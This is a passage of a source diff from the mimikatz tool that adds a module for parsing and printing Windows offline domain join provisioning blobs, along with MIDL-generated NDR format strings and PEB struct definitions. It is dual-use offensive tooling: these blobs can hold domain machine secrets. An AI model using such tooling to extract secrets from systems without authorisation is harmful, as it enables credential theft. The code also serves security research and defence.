kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(level + 1, pOpPolicyPart->pElementLists + i);
}
kprintf_level(L"Extension : 0x%p (%u)\n", pOpPolicyPart->Extension.pBlob, pOpPolicyPart->Extension.cbBlob);
kull_m_rpc_FreeOP_POLICY_PART(&pOpPolicyPart);
}
}
else kprintf(L" <empty>\n");
}
void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList)
{
DWORD i;
kprintf_level(L"[OP_POLICY_ELEMENT_LIST]\n");
level++;
kprintf_level(L"pSource : %s\n", pElementList->pSource);
kprintf_level(L"ulRootKeyId: 0x%08x\n", pElementList->ulRootKeyId);
kprintf_level(L"cElements : %u\n", pElementList->cElements);
for (i = 0; i < pElementList->cElements; i++)
{
kprintf_level(L"[%u] Element\n", i);
kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(level + 1, pElementList->pElements + i);
}
}
void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement)
{
kprintf_level(L"[OP_POLICY_ELEMENT]\n");
level++;
kprintf_level(L"pKeyPath : %s\n", pElement->pKeyPath);
kprintf_level(L"pValueName : %s\n", pElement->pValueName);
kprintf_level(L"ulValueType: 0x%08x\n", pElement->ulValueType);
kprintf_level(L"value : ");
switch (pElement->ulValueType)
{
case REG_SZ:
kprintf(L"%s\n", pElement->pValueData);
break;
case REG_BINARY:
default:
kprintf(L"%p (%u)\n", pElement->pValueData, pElement->cbValueData);
//kprinthex16(pElement->pValueData, pElement->cbValueData);
}
}

29
mimikatz/modules/misc/kuhl_m_misc_djoin.h Normal file
View File

@ -0,0 +1,29 @@
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "../kuhl_m_misc.h"
#include "../../../modules/kull_m_crypto.h"
#include "../../../modules/rpc/kull_m_rpc_ms-odj.h"
void kuhl_m_misc_djoin(int argc, wchar_t* argv[]);
void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart);
void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore);
void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore);
void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob);
void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList);
void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement);

19
modules/kull_m_crypto.c
View File

@ -5,6 +5,8 @@
*/
#include "kull_m_crypto.h"
const PCWSTR KULL_M_CRYPTO_UNK = L"?";
BOOL kull_m_crypto_hash(ALG_ID algid, LPCVOID data, DWORD dataLen, LPVOID hash, DWORD hashWanted)
{
BOOL status = FALSE;
@ -991,6 +993,23 @@ DWORD kull_m_crypto_system_store_to_dword(PCWSTR name)
return 0;
}
PCWSTR kull_m_crypto_system_store_to_name(DWORD dwStore)
{
DWORD i;
PCWSTR ret = KULL_M_CRYPTO_UNK;
for (i = 0; i < ARRAYSIZE(kull_m_crypto_system_stores); i++)
{
if (kull_m_crypto_system_stores[i].id == dwStore)
{
ret = kull_m_crypto_system_stores[i].name + 18;
break;
}
}
return ret;
}
DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name)
{
DWORD i;

1
modules/kull_m_crypto.h
View File

@ -164,6 +164,7 @@ typedef struct _KULL_M_CRYPTO_DUAL_STRING_STRING {
#define CERT_keyid_file_element 35
DWORD kull_m_crypto_system_store_to_dword(PCWSTR name);
PCWSTR kull_m_crypto_system_store_to_name(DWORD dwStore);
DWORD kull_m_crypto_provider_type_to_dword(PCWSTR name);
PCWSTR kull_m_crypto_provider_type_to_name(const DWORD dwProvType);
PCWCHAR kull_m_crypto_provider_to_realname(PCWSTR name);

24
modules/kull_m_process.h
View File

@ -266,19 +266,27 @@ typedef struct _PEB_LDR_DATA {
LIST_ENTRY InInitializationOrderModulevector;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
BYTE Reserved1[16];
PVOID Reserved2[10];
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
struct BitField {
BYTE ImageUsesLargePages :1;
BYTE SpareBits :7;
BYTE ImageUsesLargePages : 1;
BYTE SpareBits : 7;
};
HANDLE Mutant;
PVOID ImageBaseAddress;
HANDLE Mutant;
PVOID ImageBaseAddress;
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
/// ...
} PEB, *PPEB;
} PEB, * PPEB;
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
typedef struct _LSA_UNICODE_STRING_F32 {

282
modules/rpc/kull_m_rpc_ms-odj.c Normal file
View File

@ -0,0 +1,282 @@
#include "kull_m_rpc_ms-odj.h"
const GUID
GUID_JOIN_PROVIDER = { 0x631c7621, 0x5289, 0x4321, {0xbc, 0x9e, 0x80, 0xf8, 0x43, 0xf8, 0x68, 0xc3} },
GUID_JOIN_PROVIDER2 = { 0x57bfc56b, 0x52f9, 0x480c, {0xad, 0xcb, 0x91, 0xb3, 0xf8, 0xa8, 0x23, 0x17} },
GUID_JOIN_PROVIDER3 = { 0xfc0ccf25, 0x7ffa, 0x474a, {0x86, 0x11, 0x69, 0xff, 0xe2, 0x69, 0x64, 0x5f} },
GUID_CERT_PROVIDER = { 0x9c0971e9, 0x832f, 0x4873, {0x8e, 0x87, 0xef, 0x14, 0x19, 0xd4, 0x78, 0x1e} },
GUID_POLICY_PROVIDER = { 0x68fb602a, 0x0c09, 0x48ce, {0xb7, 0x5f, 0x07, 0xb7, 0xbd, 0x58, 0xf7, 0xec} };
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
#define ODJ_PROVISION_DATA_Offset 2
#define OP_PACKAGE_PART_Offset 72
#define OP_PACKAGE_PART_COLLECTION_Offset 146
#define OP_PACKAGE_Offset 192
#define ODJ_WIN7BLOB_Offset 224
#define OP_JOINPROV2_PART_Offset 418
#define OP_JOINPROV3_PART_Offset 456
#define OP_POLICY_PART_Offset 476
#define OP_CERT_PART_Offset 604
const UCHAR ms2Dodj__MIDL_TypeFormatString[] = {
0x00, 0x00, 0x12, 0x00, 0x34, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x00,
0xe6, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xde, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00,
0x08, 0x08, 0x36, 0x5b, 0x12, 0x00, 0xdc, 0xff, 0x12, 0x00, 0x30, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1b, 0x00,
0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x40, 0x36, 0x5b, 0x12, 0x00, 0xe6, 0xff, 0x1a, 0x03, 0x38, 0x00, 0x00, 0x00,
0x00, 0x00, 0x4c, 0x00, 0xce, 0xff, 0x08, 0x40, 0x4c, 0x00, 0xe0, 0xff, 0x4c, 0x00, 0xdc, 0xff, 0x5c, 0x5b, 0x12, 0x00, 0x18, 0x00, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00,
0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd2, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x4c, 0x00, 0xb1, 0xff, 0x5b, 0x12, 0x00, 0xd8, 0xff,
0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x00, 0x84, 0xff, 0x4c, 0x00, 0x98, 0xff, 0x4c, 0x00, 0x94, 0xff, 0x08, 0x40, 0x4c, 0x00, 0x8e, 0xff, 0x5c, 0x5b,
0x12, 0x00, 0x9e, 0x00, 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x02, 0x00, 0x01, 0x00, 0x17, 0x55, 0x00, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x08, 0x00, 0x06, 0x06,
0x40, 0x36, 0x5c, 0x5b, 0x12, 0x00, 0xde, 0xff, 0x1d, 0x00, 0x06, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x06, 0x00, 0x4c, 0x00, 0xf4, 0xff, 0x5c, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x04, 0x00, 0xf9, 0xff,
0x01, 0x00, 0x08, 0x5b, 0x17, 0x03, 0x08, 0x00, 0xf0, 0xff, 0x02, 0x02, 0x4c, 0x00, 0xe0, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x48, 0x00, 0x00, 0x00, 0x14, 0x00, 0x4c, 0x00, 0xba, 0xff, 0x4c, 0x00,
0xb6, 0xff, 0x4c, 0x00, 0xb2, 0xff, 0x4c, 0x00, 0x0a, 0xff, 0x36, 0x5b, 0x12, 0x00, 0xd6, 0xff, 0x1a, 0x03, 0x50, 0x00, 0x00, 0x00, 0x12, 0x00, 0x36, 0x36, 0x08, 0x4c, 0x00, 0xf5, 0xfe, 0x40,
0x36, 0x36, 0x08, 0x40, 0x36, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c,
0x1a, 0x03, 0xb8, 0x00, 0x00, 0x00, 0x10, 0x00, 0x36, 0x36, 0x36, 0x4c, 0x00, 0xa5, 0xff, 0x4c, 0x00, 0xbf, 0xff, 0x08, 0x40, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08,
0x25, 0x5c, 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x08, 0x40, 0x36, 0x36, 0x36, 0x08, 0x40, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c,
0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0x02, 0x00, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x06, 0x00, 0x08, 0x40, 0x36, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0x6a, 0x00,
0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x08, 0x00, 0x36, 0x36, 0x08, 0x08, 0x36, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08,
0x25, 0x5c, 0x12, 0x00, 0xdc, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x0c, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd4, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x18, 0x00,
0x00, 0x00, 0x08, 0x00, 0x36, 0x08, 0x08, 0x36, 0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xd6, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff,
0x00, 0x00, 0x4c, 0x00, 0xd8, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x4c, 0x00, 0x15, 0xfe, 0x5b, 0x12, 0x00, 0xd8, 0xff, 0x12, 0x00, 0x82, 0x00,
0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x28, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x38, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x36, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x5c, 0x5b,
0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xd2, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00,
0x4c, 0x00, 0xca, 0xff, 0x5c, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1a, 0x03, 0x20, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36,
0x5c, 0x5b, 0x12, 0x08, 0x25, 0x5c, 0x12, 0x00, 0xde, 0xff, 0x21, 0x03, 0x00, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xd6, 0xff, 0x5c, 0x5b,
0x1a, 0x03, 0x30, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x08, 0x40, 0x36, 0x08, 0x40, 0x36, 0x4c, 0x00, 0x7a, 0xfd, 0x5c, 0x5b, 0x12, 0x00, 0x9a, 0xff, 0x12, 0x00, 0xd0, 0xff, 0x00,
};
#elif defined(_M_IX86)
#define ODJ_PROVISION_DATA_Offset 2
#define OP_PACKAGE_PART_Offset 96
#define OP_PACKAGE_PART_COLLECTION_Offset 180
#define OP_PACKAGE_Offset 270
#define ODJ_WIN7BLOB_Offset 360
#define OP_JOINPROV2_PART_Offset 700
#define OP_JOINPROV3_PART_Offset 758
#define OP_POLICY_PART_Offset 782
#define OP_CERT_PART_Offset 998
const UCHAR ms2Dodj__MIDL_TypeFormatString[] = {
0x00, 0x00, 0x12, 0x00, 0x46, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x0c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x00,
0xe6, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03, 0x0c, 0x00, 0x19, 0x00, 0x04, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x0c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x08, 0x00, 0x08, 0x00,
0x12, 0x00, 0xc4, 0xff, 0x5b, 0x4c, 0x00, 0xcb, 0xff, 0x5b, 0x16, 0x03, 0x0c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x00, 0xd0, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x5c, 0x5b,
0x12, 0x00, 0x2c, 0x00, 0x1d, 0x00, 0x08, 0x00, 0x01, 0x5b, 0x15, 0x03, 0x10, 0x00, 0x08, 0x06, 0x06, 0x4c, 0x00, 0xf1, 0xff, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x14, 0x00, 0x01, 0x00,
0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x1c, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x24, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xda, 0xff, 0x46, 0x5c,
0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0xdc, 0xff, 0x5b, 0x4c, 0x00, 0xbf, 0xff, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x12, 0x00, 0x38, 0x00, 0x1b, 0x03, 0x24, 0x00, 0x19, 0x00, 0x00, 0x00,
0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x24, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0xa4, 0xff, 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0xa8, 0xff, 0x5b, 0x4c, 0x00, 0xaf,
0xff, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x10, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0xbc, 0xff, 0x46, 0x5c,
0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xdc, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0x26, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x10, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1b, 0x00,
0x01, 0x00, 0x19, 0x00, 0x18, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x24, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03, 0x2c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x14, 0x00,
0x14, 0x00, 0x12, 0x00, 0xce, 0xff, 0x46, 0x5c, 0x1c, 0x00, 0x1c, 0x00, 0x12, 0x00, 0xd0, 0xff, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00, 0x12, 0x00, 0xd2, 0xff, 0x5b, 0x4c, 0x00, 0x0d, 0xff, 0x08,
0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x12, 0x00, 0xb2, 0x00, 0x16, 0x03, 0x30, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00,
0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x1c, 0x00, 0x1c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x20, 0x00, 0x20, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x28, 0x00, 0x28, 0x00,
0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x2c, 0x00, 0x2c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x4c, 0x00, 0xb6, 0xfe, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1c, 0x01, 0x02, 0x00,
0x17, 0x55, 0x0e, 0x00, 0x01, 0x00, 0x17, 0x55, 0x0c, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x16, 0x00, 0x01, 0x00, 0x17, 0x55, 0x14, 0x00, 0x01, 0x00, 0x05, 0x5b,
0x1c, 0x01, 0x02, 0x00, 0x17, 0x55, 0x1e, 0x00, 0x01, 0x00, 0x17, 0x55, 0x1c, 0x00, 0x01, 0x00, 0x05, 0x5b, 0x1d, 0x00, 0x06, 0x00, 0x02, 0x5b, 0x15, 0x00, 0x06, 0x00, 0x4c, 0x00, 0xf4, 0xff,
0x5c, 0x5b, 0x1b, 0x03, 0x04, 0x00, 0x04, 0x00, 0xf9, 0xff, 0x01, 0x00, 0x08, 0x5b, 0x17, 0x03, 0x08, 0x00, 0xf0, 0xff, 0x02, 0x02, 0x4c, 0x00, 0xe0, 0xff, 0x5c, 0x5b, 0x16, 0x03, 0x6c, 0x00,
0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c,
0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, 0x74, 0xff, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x7c, 0xff, 0x46, 0x5c, 0x20, 0x00, 0x20, 0x00, 0x12, 0x00, 0x84, 0xff, 0x46, 0x5c,
0x34, 0x00, 0x34, 0x00, 0x12, 0x00, 0xa8, 0xff, 0x46, 0x5c, 0x38, 0x00, 0x38, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x3c, 0x00, 0x3c, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x54, 0x00,
0x54, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x58, 0x00, 0x58, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x60, 0x00, 0x60, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x64, 0x00, 0x64, 0x00,
0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x06, 0x06, 0x08, 0x06, 0x06, 0x08, 0x06, 0x06, 0x08, 0x4c, 0x00, 0xb7, 0xfd, 0x08, 0x4c, 0x00, 0xb4, 0xfe, 0x08, 0x5b, 0x12, 0x00, 0x02, 0x00,
0x16, 0x03, 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00,
0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0x02, 0x00, 0x16, 0x03, 0x08, 0x00, 0x4b, 0x5c,
0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x5b, 0x08, 0x08, 0x5b, 0x12, 0x00, 0xb6, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x19, 0x00, 0x0c, 0x00, 0x01, 0x00, 0x02, 0x5b, 0x16, 0x03,
0x14, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00,
0xd2, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5c, 0x5b, 0x1b, 0x03, 0x14, 0x00, 0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x14, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x00, 0x9e, 0xff, 0x5b, 0x4c, 0x00, 0xa5, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00,
0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xb6, 0xff, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1b, 0x03, 0x10, 0x00,
0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x8c, 0xff,
0x5b, 0x4c, 0x00, 0xb9, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0xc8, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x04, 0xfd,
0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x12, 0x00, 0xbe, 0x00, 0x16, 0x03, 0x1c, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x08, 0x00, 0x08, 0x00,
0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x60, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08,
0x5c, 0x5b, 0x1b, 0x03, 0x1c, 0x00, 0x19, 0x00, 0x00, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x1c, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x08, 0x00,
0x08, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x10, 0x00, 0x10, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x18, 0x00, 0x18, 0x00, 0x12, 0x00, 0x22, 0xfc, 0x5b, 0x4c, 0x00, 0x91, 0xff, 0x5b, 0x16, 0x03, 0x10, 0x00,
0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x6e, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x1b, 0x03, 0x10, 0x00,
0x19, 0x00, 0x08, 0x00, 0x01, 0x00, 0x4b, 0x5c, 0x48, 0x49, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00, 0x04, 0x00, 0x12, 0x08, 0x25, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0x44, 0xfc,
0x5b, 0x4c, 0x00, 0xb9, 0xff, 0x5b, 0x16, 0x03, 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0x6e, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xbe, 0xff,
0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x00, 0x4a, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x00,
};
#endif
const RPC_CLIENT_INTERFACE ODJ___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x00000000, 0x0000, 0x0000, {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}}, {0, 0}}, NDR_TSI_20, 0, 0, 0, 0, 0, 0x00000000 };
RPC_BINDING_HANDLE ODJ__MIDL_AutoBindHandle;
static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,};
